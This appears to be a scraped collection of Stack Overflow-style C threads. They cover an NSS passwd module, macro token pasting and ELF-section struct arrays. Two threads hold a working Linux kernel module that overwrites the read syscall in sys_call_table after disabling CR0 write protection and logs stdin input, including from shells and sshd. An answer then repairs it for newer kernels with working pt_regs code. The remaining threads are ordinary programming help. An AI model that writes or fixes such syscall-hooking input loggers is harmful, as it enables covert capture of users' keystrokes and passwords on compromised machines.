So I am trying to add a service to NSS (Name Service Switch). Please note the GNU guide on how to do it here. I have been following that guide. I need to implement a service that works with the passwd database.
The problem I am having is my module is not being called for certain functions. Let me reproduce some of my code here...
/*
 * setpwent hook of the "myservice" NSS module.
 * This demo version only prints its own name to stdout and reports success.
 */
enum nss_status
_nss_myservice_setpwent (void)
{
	const enum nss_status status = NSS_STATUS_SUCCESS;

	printf("# %s\n", __func__);
	return status;
}
/*
 * endpwent hook of the "myservice" NSS module.
 * Prints its own name to stdout and always reports success.
 */
enum nss_status
_nss_myservice_endpwent (void)
{
	const enum nss_status status = NSS_STATUS_SUCCESS;

	printf("# %s\n", __func__);
	return status;
}
/*
 * getpwent_r hook: enumerates the single dummy entry of this service.
 *
 * Calls alternate between two outcomes: one call fills `result` through
 * init_result() and returns its status, the next one returns
 * NSS_STATUS_NOTFOUND and re-arms the hook for another enumeration.
 */
enum nss_status
_nss_myservice_getpwent_r (struct passwd *result, char *buffer,
                           size_t buflen, int *errnop)
{
	static int entry_served = 0;	/* non-zero once the dummy entry was handed out */

	if (entry_served) {
		entry_served = 0;
		return NSS_STATUS_NOTFOUND;
	}

	entry_served = 1;
	printf("# %s\n", __func__);
	return init_result(result, buffer, buflen, errnop);
}
/*
 * Name lookup helper: logs the requested name and answers with the dummy
 * entry produced by init_result(), whatever `nam` is.
 */
enum nss_status
_nss_myservice_getpwbynam (const char *nam, struct passwd *result, char *buffer,
                           size_t buflen, int *errnop)
{
	enum nss_status status;

	printf("# %s with name %s\n", __func__, nam);
	status = init_result(result, buffer, buflen, errnop);
	return status;
}
/*
 * Reentrant lookup by user name: logs the requested name and fills `result`
 * with the dummy entry produced by init_result().
 *
 * Kept under its original name so existing references keep working.
 */
enum nss_status
_nss_myservice_getpwbynam_r (const char *nam, struct passwd *result, char *buffer,
                             size_t buflen, int *errnop)
{
	printf( "# %s with name_r %s\n", __FUNCTION__, nam ) ;
	return init_result( result, buffer, buflen, errnop ) ;
}

/*
 * Entry point that glibc actually resolves for getpwnam()/getpwnam_r():
 * the hook is named _nss_<service>_getpwnam_r (there is no "by" in it).
 * Without this symbol the module is skipped for lookups by name and
 * "getent passwd <name>" reports "Key not found in database".
 */
enum nss_status
_nss_myservice_getpwnam_r (const char *nam, struct passwd *result, char *buffer,
                           size_t buflen, int *errnop)
{
	return _nss_myservice_getpwbynam_r( nam, result, buffer, buflen, errnop ) ;
}
Init_result is an inline function that simply fills in the result with a dummy user no matter what the PARAMS are.
Now I have my /etc/nsswitch.conf setup as follows:
passwd: myservice compat
And for completeness here is my Makefile.
# Build the NSS module as a shared object named after the service.
all:
	gcc -fPIC -shared -o libnss_myservice.so.2 -Wl,-soname,libnss_myservice.so.2 myservice.c
# Copy the module into /lib and refresh the linker links.
install:
	sudo install -m 0644 libnss_myservice.so.2 /lib
	sudo /sbin/ldconfig -n /lib /usr/lib
# Remove the built module (the command is rm; "rf" was a typo).
clean:
	/bin/rm -rf libnss_myservice.so.2
Now after installing this nss module I run getent on the command line and here is my output:
username@host:~/nss$ getent passwd
# _nss_myservice_setpwent
# _nss_myservice_getpwent_r
myuser:mypass:1:1:realname::
root:x:0:0:root:/root:/bin/bash
...
# _nss_myservice_endpwent
So as you can see, that is working as I would expect. The iterative call is made, which returns the user, and then the compat service is called, which returns all the users from /etc/passwd.
The problem is when I make this call, "getent passwd myuser", I get a return value of 2, "Key not found in database". This shows me my _nss_myservice_getpwbynam_r function is not being called. Any ideas why? I can provide the complete code if that would help.
You need to name the function _nss_myservice_getpwnam_r instead of _nss_myservice_getpwbynam_r; glibc looks the hook up by that exact name.
After looking at ftp://ftp.acer-euro.com/gpl/Utility/glibc/glibc-2.2.5.tar/include/pwd.h :
/*
 * Declares the prototypes of the passwd hooks of the NSS service `service`.
 * The lookup-by-name hook is _nss_<service>_getpwnam_r (marked below).
 * The marker is written as a comment placed before the backslash so that
 * the line continuation of the macro stays intact.
 */
#define DECLARE_NSS_PROTOTYPES(service) \
extern enum nss_status _nss_ ## service ## _setpwent (int); \
extern enum nss_status _nss_ ## service ## _endpwent (void); \
extern enum nss_status _nss_ ## service ## _getpwnam_r /* <<< this line */ \
(const char *name, struct passwd *pwd, \
char *buffer, size_t buflen, int *errnop); \
extern enum nss_status _nss_ ## service ## _getpwuid_r \
(uid_t uid, struct passwd *pwd, \
char *buffer, size_t buflen, int *errnop); \
extern enum nss_status _nss_ ## service ##_getpwent_r \
(struct passwd *result, char *buffer, \
size_t buflen, int *errnop);
Related
This is working sample of hijacking user's input via overriding kernel's syscall read.
https://pastebin.com/K9zcSXrQ
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>
#include <linux/time.h>
#include <linux/preempt.h>
#include <linux/delay.h>
#include <linux/cred.h>
#include <linux/sched.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/types.h>
#include <linux/kfifo.h>
#include <linux/kobject.h>
#include <linux/sysfs.h>
#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>
#include <asm/atomic.h>
#include <asm/ptrace.h>
// Number of slots in the pids[] table below (indexed by pid).
#define PID_MAX 4194305
// Prefix used in every log line and as the module description.
#define MODULE_NAME "hacked_read"
// Logging helpers: dbg() prints only when `debug` is true and adds the calling function's name.
#define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.4" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail#domain.com>" );
// Enables dbg() output when set.
static bool debug = false;
// Taken around each write to the syscall table.
static DEFINE_SPINLOCK( mLock );
// Saved pointer to the handler that was in the __NR_read slot before hooking.
static unsigned long ( *original_read ) ( const struct pt_regs *regs );
// Address of the syscall table as returned by find_sym().
void **sct;
static unsigned long flags; // irq flags
// Number of tasks currently inside hacked_read_test().
static atomic_t LOCK_NUMBER_ATOM = ATOMIC_INIT(0);
// Snapshot of LOCK_NUMBER_ATOM taken by the exit handler.
static unsigned long long LOCK_NUMBER_ATOM_VAL;
// pids[p] is true while pid p is inside hacked_read_test().
static bool pids[ PID_MAX ];
static bool FORCE_EXIT = false; // force exit via method.
// ---------- force-exit handler -----
// kobject that carries the "foo" attribute below.
static struct kobject *force_exit_kobject;

// sysfs store callback: any write containing the text "exit" raises FORCE_EXIT.
// The whole input is always reported as consumed.
static ssize_t foo_store(struct kobject *kobj, struct kobj_attribute *attr, const char *buf, size_t count) {
	if ( strstr( buf, "exit" ) == NULL )
		return count;

	FORCE_EXIT = true;
	info( "Force exit method. ");
	return count;
}

// Attribute "foo": no show callback, writes are routed to foo_store().
static struct kobj_attribute foo_attribute = __ATTR( foo, S_IRUGO | S_IWUSR, NULL, foo_store );
// -------------- asm inserts -------------
// Clears bit 16 of CR0 (the x86 write-protect flag; mask 0x...feffff) so
// that read-only pages can be written. %rax is saved and restored around
// the sequence because the asm statement declares no clobbers.
static inline void rw_enable( void ) {
asm volatile ( "pushq %rax \n"
"movq %cr0, %rax \n"
"andq $0xfffffffffffeffff, %rax \n"
"movq %rax, %cr0 \n"
"popq %rax " );
}
// Returns the current value of the CR0 control register.
static inline uint64_t getcr0(void) {
	uint64_t cr0_value = 0;

	asm volatile ( "movq %%cr0, %0\n" : "=r"(cr0_value) );
	return cr0_value;
}
// Writes `val` back into CR0. Callers pass the value previously returned by
// getcr0(), which restores the state changed by rw_enable().
static inline void rw_disable( register uint64_t val ) {
asm volatile(
"movq %0, %%cr0\n"
:
:"r"(val)
);
}
// Looks up the address of kernel symbol `sym` by walking all symbols with
// kallsyms_on_each_symbol(). Returns the address, or NULL when the symbol
// is not found.
static void* find_sym( const char *sym ) {
	// static: the nested callback below stores its result here
	static unsigned long faddr;

	// ----------- nested functions are a GCC extension ---------
	// Callback: stops the walk (returns 1) at the first symbol whose name
	// equals the one passed through `data`.
	int symb_fn( void* data, const char* name, struct module* mod, unsigned long addr ) {
		if ( strcmp( (const char*)data, name ) != 0 )
			return 0;
		faddr = addr;
		return 1;
	}
	// --------------------------------------------------------

	// Reset before every search: otherwise a failed lookup would return the
	// address left over from an earlier successful call.
	faddr = 0;
	kallsyms_on_each_symbol( symb_fn, (void*)sym );
	return (void*)faddr;
}
// Replacement for the __NR_read slot of the syscall table.
//
// Forwards every call to original_read() and returns its result unchanged.
// When a read on fd 0 delivered data, the first byte of the user buffer is
// copied and logged. While a task is inside this function it is counted in
// LOCK_NUMBER_ATOM and flagged in pids[], which the exit handler polls.
static unsigned long hacked_read_test( const struct pt_regs *regs ) {
	unsigned long r;
	unsigned long cp_user_flag;
	unsigned long fd;
	unsigned long strnlen_user_val;
	unsigned long count;
	// Local and NUL-terminated: the byte is printed with %s, and a shared
	// static buffer would be overwritten by concurrent readers.
	char tmp_buffer[ 2 ] = { 0, 0 };

	atomic_inc( &LOCK_NUMBER_ATOM );
	pids[ task_pid_nr( current ) ] = true;
	r = original_read( regs );
	// injection:
	// r carries a negative errno on failure; compare as signed so that
	// failed reads are not mistaken for delivered data.
	if ( (long) r > 0 ) {
		fd = regs->di;
		if ( fd == 0 ) { // fd == 0 --> stdin (sh, sshd)
			strnlen_user_val = strnlen_user( (char*) regs->si, 1 );
			count = regs->dx;
			dbg( "strnlen_user_val: %lu\n", strnlen_user_val );
			if ( strnlen_user_val > 0 && count > 0 ) {
				// only the first byte is ever copied
				if ( strnlen_user_val > 1 ) strnlen_user_val = 1;
				cp_user_flag = copy_from_user( tmp_buffer, (char*) regs->si, strnlen_user_val );
				if ( cp_user_flag == 0 ) {
					info( "tmp_buffer: %s\n", tmp_buffer );
				}
			}
		}
	}
	atomic_dec( &LOCK_NUMBER_ATOM );
	pids[ task_pid_nr( current ) ] = false;
	return r;
}
int hacked_read_init( void ) {
register uint64_t cr0;
int cpu;
int error = 0;
sct = find_sym( "sys_call_table" );
original_read = (void *)sct[ __NR_read ];
for_each_present_cpu( cpu ) {
spin_lock_irqsave( &mLock, flags );
cr0 = getcr0( );
rw_enable( );
sct[ __NR_read ] = hacked_read_test;
rw_disable( cr0 );
spin_unlock_irqrestore( &mLock, flags );
}
force_exit_kobject = kobject_create_and_add( "hacked_read_force_exit", kernel_kobj );
if( ! force_exit_kobject ) return -ENOMEM;
error = sysfs_create_file( force_exit_kobject, &foo_attribute.attr );
if ( error ) info( "failed to create the foo file in /sys/kernel/hacked_read_force_exit \n" );
info( "Module was loaded\n" );
return 0;
}
// Module exit handler: puts original_read back into the syscall table and
// then waits until no task is left inside hacked_read_test() (or until
// FORCE_EXIT is raised through sysfs) before the module goes away.
void hacked_read_exit( void ) {
register uint64_t cr0;
int cpu;
unsigned int i;
// Restore the original handler, with the same lock/CR0 sequence used to install the hook.
for_each_present_cpu( cpu ) {
spin_lock_irqsave( &mLock, flags );
cr0 = getcr0( );
rw_enable( );
sct[__NR_read] = original_read;
rw_disable( cr0 );
spin_unlock_irqrestore( &mLock, flags );
}
// Poll every 5 seconds while tasks are still counted inside the hook,
// listing the pids that are flagged in pids[].
LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
while ( LOCK_NUMBER_ATOM_VAL != 0 ) {
info( "Locked. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL );
for( i = 0; i < PID_MAX; i++ ) if ( pids[ i ] ) info( "Locked. pid = %d\n", i );
msleep( 5000 );
LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
// Escape hatch: stop waiting once "exit" was written to the sysfs attribute.
if ( FORCE_EXIT ) {
info( "Force exit. Unload module..." );
break;
}
}
// Drop the reference on the sysfs kobject.
kobject_put( force_exit_kobject );
info( "Open. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL);
info( "Module was unloaded\n" );
}
// Register the load and unload handlers of the module.
module_init( hacked_read_init );
module_exit( hacked_read_exit );
Makefile:
# Out-of-tree build of hacked_read.ko against the running kernel.
CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)
TARGET = hacked_read
obj-m := $(TARGET).o
default:
	$(MAKE) -C $(KDIR) M=$(PWD) modules
# The recipe prefix is "@" (silent command); with "#" the lines were comments
# and "make clean" removed nothing.
clean:
	@rm -f *.o .*.cmd .*.flags *.mod.c *.order
	@rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
	@rm -fR .tmp*
	@rm -rf .tmp_versions
I've read a lot of Stack Overflow posts on the topic and found this interesting opinion:
Why do you have to implement a syscall? 99% of the time, it's the wrong way to achieve whatever you're trying to do.
it is from here.
And now, I'm looking for the way to do the same hijack without syscall, is there?
Maybe some kind of kernel-debug mechanism, something like kprobes, might give me the same result much more safely than the current raw override of the syscall.
Could somebody give me working sample, please?
In other words, I'm looking for the lawful method, not a hack.
I want to generate multiple similar functions replacing just one word across the function.
As an example, for each of the below:
OBJECT = customer
OBJECT = account
use the function template:
/*
 * Template: every occurrence of OBJECT is meant to be replaced by a concrete
 * name (e.g. customer). Stores a copy of *item_ptr at OBJECT_array[pos]
 * while holding OBJECT_array_mtx.
 */
void add_OBJECT_to_array(void* item_ptr, int pos)
{
mtx_lock(&OBJECT_array_mtx);
OBJECT_array[pos] = *(OBJECT_t*)item_ptr;
mtx_unlock(&OBJECT_array_mtx);
return;
}
So that I can call
add_order_to_array(ord, 1);
add_customer_to_array(cust, 1);
Is this possible?
Totally possible. You just need to know about the preprocessor concatenation operator ##. The following code will generate two functions add_order_to_array and add_customer_to_array.
/*
 * Expands to the definition of add_<OBJECT>_to_array(): the ## operator
 * pastes OBJECT into the function name, the mutex name, the array name and
 * the element type name.
 */
#define GENERATE_FUNC(OBJECT) \
void add_ ## OBJECT ## _to_array(void* item_ptr, int pos)\
{ \
mtx_lock(&OBJECT ## _array_mtx); \
OBJECT ## _array[pos] = *(OBJECT ## _t*)item_ptr; \
mtx_unlock(&OBJECT ## _array_mtx); \
return; \
}
/* One function per object kind. */
GENERATE_FUNC(order)
GENERATE_FUNC(customer)
The preprocessor output will be (unfortunately it does not respect formatting):
void add_order_to_array(void* item_ptr, int pos) { mtx_lock(&order_array_mtx); order_array[pos] = *(order_t*)item_ptr; mtx_unlock(&order_array_mtx); return; }
void add_customer_to_array(void* item_ptr, int pos) { mtx_lock(&customer_array_mtx); customer_array[pos] = *(customer_t*)item_ptr; mtx_unlock(&customer_array_mtx); return; }
Yes it's possible:
/*
 * Expands to the definition of add_<__obj>_to_array(), which copies
 * *item_ptr into <__obj>_array[pos] while holding <__obj>_array_mtx.
 */
#define DECLARE_ADD_FUNCTION(__obj) \
void add_##__obj##_to_array(void* item_ptr, int pos) \
{ \
mtx_lock(&__obj##_array_mtx); \
__obj##_array[pos] = *(__obj##_t*)item_ptr; \
mtx_unlock(&__obj##_array_mtx); \
return; \
}
/* One function per object kind. */
DECLARE_ADD_FUNCTION(customer)
DECLARE_ADD_FUNCTION(account)
When you look at the output of the preprocessor you get:
gcc -E foo.c
void add_customer_to_array(void* item_ptr, int pos) { mtx_lock(&customer_array_mtx); customer_array[pos] = *(customer_t*)item_ptr; mtx_unlock(&customer_array_mtx); return; }
void add_account_to_array(void* item_ptr, int pos) { mtx_lock(&account_array_mtx); account_array[pos] = *(account_t*)item_ptr; mtx_unlock(&account_array_mtx); return; }
You can even ensure that the pointer type is the correct type by changing the function prototype to add_##__obj##_to_array(__obj##_t *, int pos)
This module of mine hijacks the user's console perfectly: https://pastebin.com/99YJFnaq
And it was Linux kernel 4.12, Kali 2018.1.
Now, I've installed the latest version of Kali - 2019.1. It uses kernel 4.19:
Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1
(2019-01-03) x86_64 GNU/Linux
I'm trying to catch anything, but nothing with fd == 0 exists in flow.
I've googled for a long long time, tried to read changelogs on different resources...
I've found such module kpti, which probably would do something like that, but this module is not installed in Kali 2019.1.
Please, help me find the exact reason why hacked_read in this piece of code stopped hearing sys_read():
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>
#include <linux/time.h>
#include <linux/preempt.h>
#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>
// Capacity of debug_buffer below.
#define BUFFER_SIZE 512
// Prefix used in every log line and as the module description.
#define MODULE_NAME "hacked_read"
// Logging helpers; dbg() refers to a `debug` flag and adds the calling function's name.
#define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.1" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail#domain.com>" );
// Collects the first character of each read on fd 0.
static char debug_buffer[ BUFFER_SIZE ];
// Saved pointer to the handler that was in the __NR_read slot before hooking.
unsigned long ( *original_read ) ( unsigned int, char *, size_t );
// Address of the syscall table as returned by find_sym().
void **sct;
// Number of reads seen on fd 0.
unsigned long icounter = 0;
// Disables interrupts (cli), then clears bit 16 of CR0 (the x86
// write-protect flag; mask 0x...feffff). %rax is saved and restored around
// the sequence because the asm statement declares no clobbers.
static inline void rw_enable( void ) {
asm volatile ( "cli \n"
"pushq %rax \n"
"movq %cr0, %rax \n"
"andq $0xfffffffffffeffff, %rax \n"
"movq %rax, %cr0 \n"
"popq %rax " );
}
// Returns the current value of the CR0 control register.
static inline uint64_t getcr0(void) {
	uint64_t cr0_value = 0;

	asm volatile ( "movq %%cr0, %0\n" : "=r"(cr0_value) );
	return cr0_value;
}
// Writes `val` back into CR0 and re-enables interrupts (sti). Callers pass
// the value previously returned by getcr0().
static inline void rw_disable( register uint64_t val ) {
asm volatile(
"movq %0, %%cr0\n"
"sti "
:
:"r"(val)
);
}
// Looks up the address of kernel symbol `sym` by walking all symbols with
// kallsyms_on_each_symbol(). Returns the address, or NULL when the symbol
// is not found.
static void* find_sym( const char *sym ) {
	// static: the nested callback below stores its result here
	static unsigned long faddr;

	// ----------- nested functions are a GCC extension ---------
	// Callback: stops the walk (returns 1) at the first symbol whose name
	// equals the one passed through `data`.
	int symb_fn( void* data, const char* name, struct module* mod, unsigned long addr ) {
		if ( strcmp( (const char*)data, name ) != 0 )
			return 0;
		faddr = addr;
		return 1;
	}
	// --------------------------------------------------------

	// Reset before every search: otherwise a failed lookup would return the
	// address left over from an earlier successful call.
	faddr = 0;
	kallsyms_on_each_symbol( symb_fn, (void*)sym );
	return (void*)faddr;
}
// Replacement read handler using the argument-based syscall signature.
// Calls on descriptors other than 0 are forwarded untouched. For fd 0 the
// call is counted, forwarded, and the first character of `buf` is appended
// to debug_buffer, which is emptied once it holds more than
// BUFFER_SIZE - 100 characters.
unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
	unsigned long result;

	if ( fd != 0 ) // fd == 0 --> stdin (sh, sshd)
		return original_read( fd, buf, count );

	icounter++;
	if ( icounter % 1000 == 0 ) {
		info( "test2 icounter = %ld\n", icounter );
		info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
	}

	result = original_read( fd, buf, count );
	strncat( debug_buffer, buf, 1 );
	if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
		debug_buffer[0] = '\0';
	return result;
}
int hacked_read_init( void ) {
register uint64_t cr0;
info( "Module was loaded\n" );
sct = find_sym( "sys_call_table" );
original_read = (void *)sct[ __NR_read ];
cr0 = getcr0();
rw_enable();
sct[ __NR_read ] = hacked_read_test;
rw_disable( cr0 );
return 0;
}
// Module exit handler: writes the saved original handler back into the
// __NR_read slot, using the same CR0 save / unprotect / restore sequence as
// the init handler.
void hacked_read_exit( void ) {
	uint64_t saved_cr0;

	info( "Module was unloaded\n" );

	saved_cr0 = getcr0();
	rw_enable();
	sct[ __NR_read ] = original_read;
	rw_disable( saved_cr0 );
}
// Register the load and unload handlers of the module.
module_init( hacked_read_init );
module_exit( hacked_read_exit );
Makefile:
# Out-of-tree build of hacked_read.ko against the running kernel.
CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)
TARGET = hacked_read
obj-m := $(TARGET).o
default:
	$(MAKE) -C $(KDIR) M=$(PWD) modules
# The recipe prefix is "@" (silent command); with "#" the lines were comments
# and "make clean" removed nothing.
clean:
	@rm -f *.o .*.cmd .*.flags *.mod.c *.order
	@rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
	@rm -fR .tmp*
	@rm -rf .tmp_versions
I'm sure that everything keeps calling sys_read() just as before. tee, bash, vi - none of these could have changed in such a short period; only the Linux kernel did.
I will appreciate the code with bypassing.
A bit of troubleshooting shows the following:
Of course, none of userspace programs stopped using read(). They still keep calling it.
There is no "memory isolation". The syscall table is successfully modified during the module initialization and the pointer to sys_read() is successfully replaced with a pointer to hacked_read_test().
When the module is loaded, the read() syscall works as if it was the original one.
The change in the behavior happened between kernels 4.16 and 4.16.2 (i.e. between April 1, 2018 and April 12, 2018).
Considering this, we have pretty narrow list of commits to check, and the changes are likely to be in the syscalls mechanism. Well, looks like this commit is what we are looking for (and few more around).
The crucial part of this commit is that it changes signatures of the functions defined by SYSCALL_DEFINEx so that they accept a pointer to struct pt_regs instead of syscall arguments, i.e. sys_read(unsigned int fd, char __user * buf, size_t count) becomes sys_read(const struct pt_regs *regs). This means, that hacked_read_test(unsigned int fd, char *buf, size_t count) is no longer a valid replacement for sys_read()!
So, with new kernels you replace sys_read(const struct pt_regs *regs) with hacked_read_test(unsigned int fd, char *buf, size_t count). Why this does not crash and instead works as if it was the original sys_read()? Consider the simplified version of hacked_read_test() again:
/* Simplified view of the old-signature hook, reduced to its fd check. */
unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
/* When the caller passes a pt_regs pointer as first argument, `fd` holds
   part of that pointer and this branch is the one taken. */
if ( fd != 0 ) {
return original_read( fd, buf, count );
} else {
// ...
}
}
Well. The first function argument is passed via %rdi register. The caller of sys_read() places a pointer to struct pt_regs into %rdi and performs a call. The execution flow goes inside hacked_read_test(), and the first argument, fd, is checked for not being zero. Considering that this argument contains a valid pointer instead of file descriptor, this condition succeeds and the control flow goes directly to original_read(), which receives the fd value (i.e., actually, the pointer to struct pt_regs) as a first argument, which, in turn, then gets successfully used as it was originally meant to be. So, since kernel 4.16.2 your hacked_read_test() effectively works as follows:
/* Effective behavior of the old hook on the new ABI: a plain pass-through. */
unsigned long hacked_read_test( const struct pt_regs *regs ) {
return original_read( regs );
}
To make sure about it, you can try the alternative version of hacked_read_test():
/*
 * Diagnostic variant: logs the raw first argument both as an integer and as
 * a pointer, then forwards it unchanged to the original handler. A NULL
 * argument is rejected with -EINVAL.
 */
unsigned long hacked_read_test( void *ptr ) {
if ( ptr != 0 ) {
info( "invocation of hacked_read_test(): 1st arg is %d (%p)", ptr, ptr );
return original_read( ptr );
} else {
return -EINVAL;
}
}
After compiling and insmoding this version, you get the following:
invocation of hacked_read_test(): 1st arg is 35569496 (00000000c3a0dc9e)
You may create a working version of hacked_read_test(), but it seems that the implementation will be platform-dependent, as you will have to extract the arguments from the appropriate register fields of regs (for x86_64 these are %rdi, %rsi and %rdx for the 1st, 2nd and 3rd syscall arguments respectively).
The working x86_64 implementation is below (tested on kernel 4.19).
#include <asm/ptrace.h>
// ...
/* Saved original handler; it takes the register set instead of separate arguments. */
unsigned long ( *original_read ) ( const struct pt_regs *regs );
// ...
unsigned long hacked_read_test( const struct pt_regs *regs ) {
unsigned int fd = regs->di;
char *buf = (char*) regs->si;
unsigned long r = 1;
if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
return original_read( regs );
} else {
icounter++;
if ( icounter % 1000 == 0 ) {
info( "test2 icounter = %ld\n", icounter );
info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
}
r = original_read( regs );
strncat( debug_buffer, buf, 1 );
if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
debug_buffer[0] = '\0';
return r;
}
}
This question is something of a trick C question or a trick clang/gcc question. I'm not sure which.
I phrased it like I did because the final array is in main.c, but the structs that are in the array are defined in C modules.
The end goal of what I am trying to do is to be able to define structs in separate C modules and then have those structs be available in a contiguous array right from program start. I do not want to use any dynamic code to declare the array and put in the elements.
I would like it all done at compile or link time -- not at run time.
I'm looking to end up with a monolithic blob of memory that gets setup right from program start.
For the sake of the Stack Overflow question, I thought it would make sense if I imagined these as "drivers" (like in the Linux kernel) Going with that...
Each module is a driver. Because the team is complex, I do not know how many drivers there will ultimately be.
Requirements:
Loaded into contiguous memory (an array)
Loaded into memory at program start
installed by the compiler/linker, not dynamic code
a driver exists because source code exists for it (no dynamic code to load them up)
Avoid cluttering up the code
Here is a contrived example:
// myapp.h
//////////////////////////
#include <stdint.h> /* int16_t: makes the header self-contained */

/* Scratch data handed to every driver callback. */
struct state
{
    int16_t data[10];
};

/* Description of one driver: its name and its callback. */
struct driver
{
    char name[255];
    int16_t (*on_do_stuff) (struct state *state);
    /* other stuff snipped out */
};
// drivera.c
//////////////////////////
#include "myapp.h"
/*
 * Callback of drivera. Placeholder body: returns 0 so that the function,
 * which is declared to return int16_t, never ends without a value.
 */
static int16_t _on_do_stuff(struct state *state)
{
    (void)state; /* unused until the real work is filled in */
    /* do stuff */
    return 0;
}

/* Driver record of this module. */
static const struct driver _driver = {
    .name = "drivera",
    .on_do_stuff = _on_do_stuff
};
// driverb.c
//////////////////////////
#include "myapp.h"
/*
 * Callback of driverb. Placeholder body: returns 0 so that the function,
 * which is declared to return int16_t, never ends without a value.
 */
static int16_t _on_do_stuff(struct state *state)
{
    (void)state; /* unused until the real work is filled in */
    /* do stuff */
    return 0;
}

/* Driver record of this module. */
static const struct driver _driver = {
    .name = "driverb",
    .on_do_stuff = _on_do_stuff
};
// driverc.c
//////////////////////////
#include "myapp.h"
/*
 * Callback of driverc. Placeholder body: returns 0 so that the function,
 * which is declared to return int16_t, never ends without a value.
 */
static int16_t _on_do_stuff(struct state *state)
{
    (void)state; /* unused until the real work is filled in */
    /* do stuff */
    return 0;
}

/* Driver record of this module. */
static const struct driver _driver = {
    .name = "driverc",
    .on_do_stuff = _on_do_stuff
};
// main.c
//////////////////////////
#include <stdio.h>
/*
 * Desired result (pseudo-code): one contiguous table holding every driver,
 * closed by an all-zero entry. The "somehow" initializers are placeholders.
 */
static struct driver the_drivers[] = {
{drivera somehow},
{driverb somehow},
{driverc somehow},
{0}
};
int main(void)
{
struct state state;
struct driver *current = the_drivers;
while (current != 0)
{
printf("we are up to %s\n", current->name);
current->on_do_stuff(&state);
current += sizeof(struct driver);
}
return 0;
}
This doesn't work exactly.
Ideas:
On the module-level structs, I could remove the static const keywords, but I'm not sure how to get them into the array at compile time
I could move all of the module-level structs to main.c, but then I would need to remove the static keyword from all of the on_do_stuff functions, and thereby clutter up the namespace.
In the Linux kernel, they somehow define kernel modules in separate files and then, through linker magic, they are able to be loaded into a monolithic image.
Use a dedicated ELF section to "collect" the data structures.
For example, define your data structure in info.h as
#ifndef INFO_H
#define INFO_H
#ifndef INFO_ALIGNMENT
#if defined(__LP64__)
#define INFO_ALIGNMENT 16
#else
#define INFO_ALIGNMENT 8
#endif
#endif
struct info {
long key;
long val;
} __attribute__((__aligned__(INFO_ALIGNMENT)));
#define INFO_NAME(counter) INFO_CAT(info_, counter)
#define INFO_CAT(a, b) INFO_DUMMY() a ## b
#define INFO_DUMMY()
#define DEFINE_INFO(data...) \
static struct info INFO_NAME(__COUNTER__) \
__attribute__((__used__, __section__("info"))) \
= { data }
#endif /* INFO_H */
The INFO_ALIGNMENT macro is the alignment used by the linker to place each symbol, separately, to the info section. It is important that the C compiler agrees, as otherwise the section contents cannot be treated as an array. (You'll obtain an incorrect number of structures, and only the first one (plus every N'th) will be correct, the rest of the structures garbled. Essentially, the C compiler and the linker disagreed on the size of each structure in the section "array".)
Note that you can add preprocessor macros to fine-tune the INFO_ALIGNMENT for each of the architectures you use, but you can also override it for example in your Makefile, at compile time. (For GCC, supply -DINFO_ALIGNMENT=32 for example.)
The used attribute ensures that the definition is emitted in the object file, even though it is not referenced otherwise in the same data file. The section("info") attribute puts the data into a special info section in the object file. The section name (info) is up to you.
Those are the critical parts, otherwise it is completely up to you how you define the macro, or whether you define it at all. Using the macro is easy, because one does not need to worry about using unique variable name for the structure. Also, if at least one member is specified, all others will be initialized to zero.
In the source files, you define the data objects as e.g.
#include "info.h"
/* Suggested, easy way */
DEFINE_INFO(.key = 5, .val = 42);
/* Alternative way, without relying on any macros */
/* The attributes are the same ones DEFINE_INFO applies. */
static struct info foo __attribute__((__used__, __section__("info"))) = {
.key = 2,
.val = 1
};
The linker provides symbols __start_info and __stop_info, to obtain the structures in the info section. In your main.c, use for example
#include "info.h"
/* Linker-provided symbols marking the start and end of the "info" section. */
extern struct info __start_info[];
extern struct info __stop_info[];
/* Number of struct info objects in the section. */
#define NUM_INFO ((size_t)(__stop_info - __start_info))
/* Pointer to the i-th struct info in the section. */
#define INFO(i) ((__start_info) + (i))
